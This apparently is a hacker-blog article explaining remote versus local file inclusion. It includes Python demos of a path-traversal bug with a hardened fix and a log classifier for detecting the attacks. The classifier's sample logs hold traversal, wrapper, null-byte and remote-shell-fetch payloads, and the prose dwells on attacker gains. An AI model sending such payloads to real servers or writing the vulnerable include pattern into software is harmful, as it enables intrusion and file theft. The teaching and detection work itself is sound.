Today I want to talk about two different types of file inclusion techniques that can be used to exploit web applications: remote file inclusion (RFI) and local file inclusion (LFI). I also want to talk about the difference between the two, since they tend to be mistaken for one another, as well as a few techniques that can be used to mitigate them.
I'll be discussing the following topics in order:
- Premise
- What is remote file inclusion?
- What is local file inclusion?
- The difference between the two
- What is RCE?
You can click on any of the topics to jump straight to the one that interests you!
Today's article will include a video demonstration of how to perform local file inclusion, exploited through directory traversal, against a remote web application server. I'll even cover one of the best FREE beginner tools that you can use to apply the technique in a more automated fashion.
If you would like to see how to perform remote file inclusion, as well as the best means to do so, then I suggest checking out this video from my Patreon lab for the TCPBackdoor exploit.
Remote file inclusion is a vulnerability in which a web application builds the path of a file it is going to include (and execute) from user-controlled input, and that input is not restricted to local files. An attacker can point it at a file hosted on a server they control, and the web application server fetches and runs that file as if it were part of its own code. This allows the threat actor to infect and/or control the web application on a massive scale, as well as deliver unsuspecting payloads to end users of the service. If done correctly, and not mitigated, it can lead to the compromise of many end user networks and IoT devices.
As you know, web application servers use the HTTP/HTTPS protocol to host various HTML files that end users access over the internet through a web browser. When you visit a website, you're redirected to the main HTML index page welcoming you to the site. From there the end user browses the site through the main UI (user interface), which lets them view any and all HTML pages hosted on the web application, as well as any other resources that might be included with it.
Web applications, as I mentioned earlier, also host other files that are accessible to the end user, like executables, which are downloaded to their system the moment they visit the resource's location on the server.
For example: https://website[.]com/Download.exe (JUST AN EXAMPLE! IT'S NOT REAL)
When you visit this link, it downloads a file known simply as "Download.exe". Much like an HTML page is automatically displayed and interpreted on the screen for you, downloadable non-HTML files are automatically saved to your system for you to use.
Remote file inclusion lets an attacker abuse both of these behaviours, because the file the server ends up running is one the attacker wrote. Here is what that buys them:
#1, it can host fake pages and replace the pre-existing ones with spoofed pages that are malicious.
Ever heard of a website that was hacked, and suddenly all the "legitimate" web pages on it were malicious and infected end user systems? Well, this is one way threat actors go about it when they compromise a web application.
By exploiting this vulnerability in a LEGITIMATE web application, you not only get past the browser and reputation-based protections that are meant to keep end users away from spoofed sites (the malicious content is served from the real domain), BUT you also trick the end user into visiting pages that are malicious, allowing you to steal sensitive credentials, and even land a botnet on the end user's network should you want to extend your overall reach.
#2, it can be used to host executables that are auto downloaded to the victim's system
It's no shocker that one of the bread-and-butter moves for a threat actor is to use this technique to host malicious payloads that are downloaded to the victim's system. This can be deadly if the replaced file is a widely trusted executable and users run it without verifying its signature.
Imagine VSCode, a desktop application that is commonly trusted and downloaded onto millions of systems daily, suddenly replaced with a fake version that end user systems accept. This would lead to a massive breach on many systems, and if the attacker can also get the binary past signature checks (a stolen signing key, or users who never verify), security tooling won't save them. They can even do stuff like DLL and code injection, as well as many obfuscation techniques, to go undetected. The list goes on with the amount of creativity and devastating damage that can be done should an attacker land this critical flaw against a well trusted system.
#3, it gives you remote code execution (RCE), and with it the ability to read the server's file system.
If you manage to get the application to include a PHP file you control, you basically have a remote backdoor into the system that you can tap into whenever you need to, and from which you can extend your reach into the network the web application is hosted on.
Local file inclusion is a vulnerability in which the application includes a file from its own file system based on user input. It is most often exploited with directory traversal sequences (../), which is why the two terms get used interchangeably, but traversal is the technique and LFI is the bug. On its own this isn't a form of RCE, no, BUT it does allow you to read files that are outside the bounds of the web application root directory.
As mentioned before, when you visit a web application you are reading HTML files that live on the server's file system.
For security reasons, the web server is configured to serve only what sits under the web application's root directory; anything outside those bounds is off limits to you.
Directory traversal bypasses this restriction and allows you to read files elsewhere on the system. The practical limit is the permissions of the account the web server runs as: you can read whatever it can read, which is usually still plenty.
This can also lead to RCE. If, for example, there is an SSH service exposed and you find credentials on the file system that let you connect with the right privileges, you can extend your attack well beyond the web application.
You can also read sensitive files to gain access to password data that lets you compromise any services tied to the web application, such as the administrative credentials for its login pages if they happen to be stored on disk.
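To make the traversal point concrete, here is an added example (not the author's code) of the bug as it usually appears in a page-loading handler, next to a hardened version. It builds a throwaway web root and a sensitive file outside it in a temporary directory, so the file names, the `page` parameter and the secret's contents are all constructed for the demo.

```python
"""Vulnerable vs hardened "page include" handler (added example).

The web root and the sensitive file outside it are constructed in a
temporary directory so the demo runs offline; nothing here touches a
real server.
"""
import os
import tempfile
from pathlib import Path

# --- constructed sample file system ---------------------------------
_BASE = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
WEB_ROOT = _BASE / "var" / "www" / "html"
WEB_ROOT.mkdir(parents=True)
(WEB_ROOT / "index.html").write_text("<h1>Welcome</h1>")
(WEB_ROOT / "about.html").write_text("<h1>About us</h1>")

# A file that must never be served: it lives outside the web root.
SECRET = _BASE / "etc" / "app.conf"
SECRET.parent.mkdir(parents=True)
SECRET.write_text("db_password=hunter2")

ALLOWED_PAGES = {"index.html", "about.html"}


def vulnerable_read(page: str) -> str:
    """The flawed pattern: join user input straight onto the web root.

    os.path.join discards WEB_ROOT entirely when ``page`` is absolute,
    and ``..`` components walk out of it, so this reads anything the
    web server process can read.
    """
    path = os.path.join(WEB_ROOT, page)
    with open(path) as fh:
        return fh.read()


def safe_read(page: str) -> str:
    """Hardened version: allowlist first, containment check second."""
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"page not on allowlist: {page!r}")
    root = os.path.realpath(WEB_ROOT)
    path = os.path.realpath(os.path.join(root, page))
    # Defence in depth: even an allowlisted name must resolve under the
    # root (guards against a symlink planted inside the web root).
    if os.path.commonpath([root, path]) != root:
        raise PermissionError(f"path escapes web root: {page!r}")
    with open(path) as fh:
        return fh.read()


def traversal_payload() -> str:
    """Relative path from the web root up to the secret, as an attacker
    would send it in the ``page`` parameter (html -> www -> var -> base)."""
    return "../../../etc/app.conf"


def demo() -> dict:
    """Run both handlers against a benign page and attacker payloads."""
    results = {
        "vuln_benign": vulnerable_read("about.html"),
        "vuln_traversal": vulnerable_read(traversal_payload()),
        "vuln_absolute": vulnerable_read(str(SECRET)),   # absolute path wins
        "safe_benign": safe_read("about.html"),
        "safe_blocked": 0,
    }
    for payload in (traversal_payload(), str(SECRET),
                    "../../../etc/../etc/app.conf"):
        try:
            safe_read(payload)
        except PermissionError:
            results["safe_blocked"] += 1
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Two details worth noticing: `os.path.join` silently drops the base directory when the second argument is absolute, so an absolute path is as effective as `../`, and the allowlist does the real work in the hardened version; the `realpath` containment check only backs it up.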
The biggest overall difference between remote file inclusion and local file inclusion is where the included file comes from. With remote file inclusion, the server fetches and executes a file from a location the attacker controls, so the attacker is effectively adding their own code to the web application and can use it to replace legitimate files or infect the site.
Local file inclusion works with files that already exist on the server. It is mostly used to browse the system for sensitive files and/or credentials. You can exploit it in various ways, including through wrappers or application features on the system that print text data from files on the web application server.
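Because the two bugs sit in the same place (an include path built from user input) and differ only in where the file comes from, the cleanest way to tell them apart in practice is by the shape of the parameter value. The following is an added example, not part of the original article, that classifies the `page` parameter in a handful of constructed access-log lines as RFI, LFI or benign; the IP addresses, paths and payloads are all made up for the demo.

```python
"""Telling RFI from LFI in request logs (added example, constructed data).

Each request's query parameters are decoded (repeatedly, to defeat
double encoding) and labelled by value shape: a remote scheme means the
server would fetch the file from elsewhere (RFI); traversal sequences,
absolute paths, null bytes and local wrappers mean a file already on
the server (LFI).
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines in combined log format.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=http://203.0.113.66/shell.txt HTTP/1.1" 200 88
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 700
203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?page=/etc/passwd%00.php HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?page=contact HTTP/1.1" 200 480
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Schemes that make the server fetch the file from somewhere else.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "//")
# Markers for a file that is already on the server (php://filter reads
# a local file through a stream wrapper, so it counts as LFI here).
LOCAL_MARKERS = ("../", "..\\", "php://filter", "file://", "\x00")


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value: str) -> str:
    v = decode_fully(value).lower()
    if v.startswith(REMOTE_SCHEMES):
        return "RFI"
    if any(marker in v for marker in LOCAL_MARKERS) or v.startswith("/"):
        return "LFI"
    return "benign"


def classify_line(line: str) -> list:
    """Return (param, raw_value, label) for each query parameter in a log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    # parse_qsl already does one round of percent-decoding.
    return [(name, value, classify_value(value))
            for name, value in parse_qsl(query, keep_blank_values=True)]


def scan(log_text: str) -> dict:
    """Count requests per label across a block of log text."""
    counts = {"RFI": 0, "LFI": 0, "benign": 0}
    for line in log_text.splitlines():
        for _, _, label in classify_line(line):
            counts[label] += 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        for name, value, label in classify_line(line):
            print(f"{label:6s} {name}={value}")
    print(scan(SAMPLE_LOG))
```

The decoding loop is the part most detection rules get wrong: a single `unquote` sees `%252e%252e%252f` as the harmless-looking string `%2e%2e%2f`, while the application (or a second decoding layer in front of it) turns it into `../`.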
RCE, RCE, RCE! You've been hearing me say this a lot, but I haven't quite yet explained what it means, right?
RCE, remote code execution, is the main goal and bread and butter of injection exploits against any system. It is the outcome many exploit classes aim for: buffer overflows, SQL injection, file inclusion, and so on. It's also just a common end game for any form of breach.
The end goal is usually to find a way to get RCE on a system in order to control it directly through shell commands, which can be combined with various coding techniques to do more damage.
If you'd like to see the more advanced version of this article, which covers methods that can be used to mitigate these vulnerabilities, as well as the included videos, SUBSCRIBE TO MY PATREON CYBER SECURITY TIER!
If you enjoyed this post, give it a thumbs up! I'll be keeping track of who's reacting from now on, as there is a "special" reason for it. Just know the more you support my content, the more there is in store!
- The Hacker Who Laughs